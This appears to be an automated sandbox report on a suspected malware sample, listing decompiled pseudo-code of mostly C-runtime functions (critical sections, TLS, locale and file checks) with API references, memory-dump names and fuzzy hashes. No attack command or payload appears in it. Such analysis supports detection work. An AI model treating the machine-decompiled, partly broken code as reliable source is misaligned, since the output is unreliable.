                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042B8E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0042B8E2(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;
				void* _t8;
				void* _t11;

				_t2 = _a4;
				if(_t2 < 0x442038 || _t2 > 0x442298) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E00422A33(_t8, _t11, (_t2 - 0x442038 >> 5) + 0x10);
				}
			}







                                                                                                                            0x0042b8e2
                                                                                                                            0x0042b8ed
                                                                                                                            0x0042b906
                                                                                                                            0x0042b90a
                                                                                                                            0x0042b910
                                                                                                                            0x0042b8f6
                                                                                                                            0x0042b905
                                                                                                                            0x0042b905

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0042B8FF
                                                                                                                              • Part of subcall function 00422A33: __mtinitlocknum.LIBCMT ref: 00422A47
                                                                                                                              • Part of subcall function 00422A33: __amsg_exit.LIBCMT ref: 00422A53
                                                                                                                              • Part of subcall function 00422A33: EnterCriticalSection.KERNEL32(?,?,4917EADC,0041DA00,00000004,0043D058,0000000C,0042263C,?,?,00000000,00000000,00000000,004222DE,00000001,00000214), ref: 00422A5B
                                                                                                                            • EnterCriticalSection.KERNEL32(?,0042FBC1,?,0043D588,0000000C,0042D188,?,0043D520,00000010,0042B8D5), ref: 0042B90A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID: @WD
                                                                                                                            • API String ID: 3996875869-193993416
                                                                                                                            • Opcode ID: 55e885f5ec005edad41a8af9b719a0bf7de87812cd7d1e10c3b52bc9f02b0dbf
                                                                                                                            • Instruction ID: c380d9eaa68bc0dc67421dc9b4c9b54ee04b06da83f9823be229f5a9a24cbed1
                                                                                                                            • Opcode Fuzzy Hash: 55e885f5ec005edad41a8af9b719a0bf7de87812cd7d1e10c3b52bc9f02b0dbf
                                                                                                                            • Instruction Fuzzy Hash: 74D0A7F1700121239F285561AE8960E5354D2403033944D5BF102C1580CB99D580404D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407265 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00407265(void* __ecx) {
				char _v8;
				char _v12;
				void* _t11;

				_t1 =  &_v8; // 0x442948
				_v8 = 0x4429e0;
				E00420866(_t1, 0x43b350);
				asm("int3");
				_t3 =  &_v12; // 0x4429e0
				return  *((intOrPtr*)( *((intOrPtr*)( *_t3)) + 4))(0, __ecx, _t11);
			}






                                                                                                                            0x0040726e
                                                                                                                            0x00407272
                                                                                                                            0x00407279
                                                                                                                            0x0040727e
                                                                                                                            0x0040727f
                                                                                                                            0x0040728a

                                                                                                                            APIs
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00407279
                                                                                                                              • Part of subcall function 00420866: RaiseException.KERNEL32(?,?,00000008,?), ref: 004208A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionException@8RaiseThrow
                                                                                                                            • String ID: H)D$)D
                                                                                                                            • API String ID: 3976011213-1592238949
                                                                                                                            • Opcode ID: ae657d5d9c62ecc51b1d9a32a50c0a6f47cfc73b62a4c56f4b60bebc8a243c61
                                                                                                                            • Instruction ID: e447bf3bcd3aed0fd77e1af2a6b293a6de2072b981d93a261567d151086f25e4
                                                                                                                            • Opcode Fuzzy Hash: ae657d5d9c62ecc51b1d9a32a50c0a6f47cfc73b62a4c56f4b60bebc8a243c61
                                                                                                                            • Instruction Fuzzy Hash: 4DD0A7B0600208BFD300DBC2CA0AF4BB7ECDF04700F60805AF60483141C7F1AE00CA65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E36C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041E36C(void* __eax, void* __esi) {
				void* _t13;
				intOrPtr _t16;

				_t1 = _t13 + 5;
				 *_t1 =  *((intOrPtr*)(_t13 + 5)) + __esi;
				_t16 =  *_t1;
			}





                                                                                                                            0x0041e371
                                                                                                                            0x0041e371
                                                                                                                            0x0041e371

                                                                                                                            APIs
                                                                                                                            • __FF_MSGBANNER.LIBCMT ref: 0041E374
                                                                                                                              • Part of subcall function 00423859: __NMSG_WRITE.LIBCMT ref: 00423880
                                                                                                                              • Part of subcall function 00423859: __NMSG_WRITE.LIBCMT ref: 0042388A
                                                                                                                            • __NMSG_WRITE.LIBCMT ref: 0041E37D
                                                                                                                              • Part of subcall function 004236B9: _strcpy_s.LIBCMT ref: 00423725
                                                                                                                              • Part of subcall function 004236B9: __invoke_watson.LIBCMT ref: 00423736
                                                                                                                              • Part of subcall function 004236B9: GetModuleFileNameA.KERNEL32(00000000,00444C49,00000104,?,4917EADC), ref: 00423752
                                                                                                                              • Part of subcall function 004236B9: _strcpy_s.LIBCMT ref: 00423767
                                                                                                                              • Part of subcall function 004236B9: __invoke_watson.LIBCMT ref: 0042377A
                                                                                                                              • Part of subcall function 004236B9: _strlen.LIBCMT ref: 00423783
                                                                                                                              • Part of subcall function 004236B9: _strlen.LIBCMT ref: 00423790
                                                                                                                              • Part of subcall function 004236B9: __invoke_watson.LIBCMT ref: 004237BD
                                                                                                                              • Part of subcall function 0041E0AD: ___crtCorExitProcess.LIBCMT ref: 0041E0B1
                                                                                                                              • Part of subcall function 0041E0AD: ExitProcess.KERNEL32 ref: 0041E0BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$FileModuleName___crt
                                                                                                                            • String ID: |GD
                                                                                                                            • API String ID: 4122421049-1814238317
                                                                                                                            • Opcode ID: 4446e3b942f648cca2fcb9fd31836b555510fbc38ab781acd09418fdad1ef7af
                                                                                                                            • Instruction ID: 9d0dfb5ece8506740046646f94fff6e418b72e8ebe29c6cb0cb6b3767df48335
                                                                                                                            • Opcode Fuzzy Hash: 4446e3b942f648cca2fcb9fd31836b555510fbc38ab781acd09418fdad1ef7af
                                                                                                                            • Instruction Fuzzy Hash: 53C08C351043203AD6103A126403B0C36F28F84719F60803FF905184828B6C4681288E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E6DE Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E0040E6DE(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0040E37B( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                                                                                                                            0x0040e6e1
                                                                                                                            0x0040e6e6
                                                                                                                            0x0040e6e9
                                                                                                                            0x0040e6ee
                                                                                                                            0x0040e6f0
                                                                                                                            0x0040e6f3
                                                                                                                            0x0040e737
                                                                                                                            0x0040e737
                                                                                                                            0x0040e73b
                                                                                                                            0x0040e745
                                                                                                                            0x0040e74b
                                                                                                                            0x0040e754
                                                                                                                            0x0040e760
                                                                                                                            0x0040e766
                                                                                                                            0x0040e76c
                                                                                                                            0x0040e770
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6f5
                                                                                                                            0x0040e6f5
                                                                                                                            0x0040e6f5
                                                                                                                            0x0040e6fa
                                                                                                                            0x0040e717
                                                                                                                            0x0040e71c
                                                                                                                            0x0040e722
                                                                                                                            0x0040e722
                                                                                                                            0x0040e724
                                                                                                                            0x0040e727
                                                                                                                            0x0040e705
                                                                                                                            0x0040e705
                                                                                                                            0x0040e70c
                                                                                                                            0x0040e70e
                                                                                                                            0x0040e70e
                                                                                                                            0x0040e70c
                                                                                                                            0x0040e72b
                                                                                                                            0x0040e72c
                                                                                                                            0x0040e735
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040E73B
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 0040E74B
                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040E754
                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 0040E766
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2949335588-0
                                                                                                                            • Opcode ID: f18c838dd6cc395ba07ec5f64aee3758ae5e0cbc4d7a88b180f2e356e2374bb3
                                                                                                                            • Instruction ID: 4190a76f79b0288e48b7f3389b667fa6dc89861cae0d150d094d68caee5c1476
                                                                                                                            • Opcode Fuzzy Hash: f18c838dd6cc395ba07ec5f64aee3758ae5e0cbc4d7a88b180f2e356e2374bb3
                                                                                                                            • Instruction Fuzzy Hash: 82119734600200EFCB20CF6AD884F5AB7B4FF05306F10887EE152976A1CB79A960CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418196 Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E00418196(void* __ebp, signed int _a4) {
				struct _CRITICAL_SECTION* _t4;
				void* _t10;
				signed int _t11;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t11 = _a4;
				if(_t11 >= 0x11) {
					_t4 = E0040D8B0(_t10);
				}
				if( *0x4444c0 == 0) {
					_t4 = E0041812D();
				}
				_push(_t17);
				_t15 = 0x444678 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x444660);
					if( *_t15 == 0) {
						_t4 = 0x4444c8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x444660);
				}
				EnterCriticalSection(0x4444c8 + _t11 * 0x18);
				return _t4;
			}








                                                                                                                            0x00418196
                                                                                                                            0x00418197
                                                                                                                            0x0041819e
                                                                                                                            0x004181a0
                                                                                                                            0x004181a0
                                                                                                                            0x004181ac
                                                                                                                            0x004181ae
                                                                                                                            0x004181ae
                                                                                                                            0x004181ba
                                                                                                                            0x004181bc
                                                                                                                            0x004181cb
                                                                                                                            0x004181d2
                                                                                                                            0x004181d7
                                                                                                                            0x004181de
                                                                                                                            0x004181e1
                                                                                                                            0x004181e7
                                                                                                                            0x004181e7
                                                                                                                            0x004181ee
                                                                                                                            0x004181ee
                                                                                                                            0x004181fa
                                                                                                                            0x00418200

                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(00444660,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181D2
                                                                                                                            • InitializeCriticalSection.KERNEL32(4917EADC,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181E1
                                                                                                                            • LeaveCriticalSection.KERNEL32(00444660,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181EE
                                                                                                                            • EnterCriticalSection.KERNEL32(4917EADC,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181FA
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3253506028-0
                                                                                                                            • Opcode ID: 5ba5fbf231088f9ca5c6c029636e1c9a04918763e499700c3231d3a8c254c7c3
                                                                                                                            • Instruction ID: 5f8e25f06513e7abab6169f5796848e1e53c3c657792d1f28f2f4d5534ba39cb
                                                                                                                            • Opcode Fuzzy Hash: 5ba5fbf231088f9ca5c6c029636e1c9a04918763e499700c3231d3a8c254c7c3
                                                                                                                            • Instruction Fuzzy Hash: 10F09073600105ABEA105F95EC85B5AB76AEBD331AF57122FF14042151CF3D95828A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E26E Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040E26E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0 || _t14 >= _t16[3]) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				} else {
					_t9 = TlsGetValue( *_t16);
					if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
						goto L5;
					} else {
						LeaveCriticalSection(_t12);
						return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
					}
				}
			}







                                                                                                                            0x0040e270
                                                                                                                            0x0040e273
                                                                                                                            0x0040e273
                                                                                                                            0x0040e277
                                                                                                                            0x0040e27d
                                                                                                                            0x0040e283
                                                                                                                            0x0040e2ac
                                                                                                                            0x0040e2ad
                                                                                                                            0x00000000
                                                                                                                            0x0040e28a
                                                                                                                            0x0040e28c
                                                                                                                            0x0040e294
                                                                                                                            0x00000000
                                                                                                                            0x0040e29b
                                                                                                                            0x0040e2a2
                                                                                                                            0x00000000
                                                                                                                            0x0040e2a8
                                                                                                                            0x0040e294

                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,00000000,?,?,0040E833,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E277
                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,0040E833,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E28C
                                                                                                                            • LeaveCriticalSection.KERNEL32(0000001C,?,?,0040E833,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E2A2
                                                                                                                            • LeaveCriticalSection.KERNEL32(0000001C,?,?,0040E833,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E2AD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3969253408-0
                                                                                                                            • Opcode ID: f108b3645919e440296fa21c417e76f64ccff90d860cf44fecf4881b089a3452
                                                                                                                            • Instruction ID: 6f9a73263bd24ffeae5009d893a0d89c18b5999a21c23a5cfd275eb8e594be86
                                                                                                                            • Opcode Fuzzy Hash: f108b3645919e440296fa21c417e76f64ccff90d860cf44fecf4881b089a3452
                                                                                                                            • Instruction Fuzzy Hash: B4F082362002009FC7208F65DC49917B3ADFF8435631A58BEF802E3251D739F9159B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Executed Functions

                                                                                                                            Function 0040B044 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                                                                                            0x0040b04a
                                                                                                                            0x0040b04d
                                                                                                                            0x0040b050
                                                                                                                            0x0040b053
                                                                                                                            0x0040b055
                                                                                                                            0x0040b05b
                                                                                                                            0x0040b062
                                                                                                                            0x0040b063
                                                                                                                            0x0040b068
                                                                                                                            0x0040b06b
                                                                                                                            0x0040b070
                                                                                                                            0x0040b076
                                                                                                                            0x0040b07f
                                                                                                                            0x0040b08f
                                                                                                                            0x0040b09c
                                                                                                                            0x0040b0a3
                                                                                                                            0x0040b0aa
                                                                                                                            0x0040b0ac
                                                                                                                            0x0040b0bd
                                                                                                                            0x0040b0ca
                                                                                                                            0x0040b0d1
                                                                                                                            0x0040b0d8
                                                                                                                            0x0040b0dc
                                                                                                                            0x0040b0dc
                                                                                                                            0x0040b0d8
                                                                                                                            0x0040b0e3
                                                                                                                            0x0040b0e6
                                                                                                                            0x0040b0e9
                                                                                                                            0x0040b0f6
                                                                                                                            0x0040b103

                                                                                                                            APIs
                                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                                                                              • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                                                              • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3216391948-0
                                                                                                                            • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                                                            • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                                                                            • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                                                            • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AEF4 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 46%
                                                                                                                            			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                                                                                            0x0040aefd
                                                                                                                            0x0040aefe
                                                                                                                            0x0040af04
                                                                                                                            0x0040af0b
                                                                                                                            0x0040af0c
                                                                                                                            0x0040af11
                                                                                                                            0x0040af14
                                                                                                                            0x0040af27
                                                                                                                            0x0040af34
                                                                                                                            0x0040af37
                                                                                                                            0x0040af37
                                                                                                                            0x0040af3e
                                                                                                                            0x0040af41
                                                                                                                            0x0040af44
                                                                                                                            0x0040af51

                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                                                            • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                                                                            • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                                                            • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
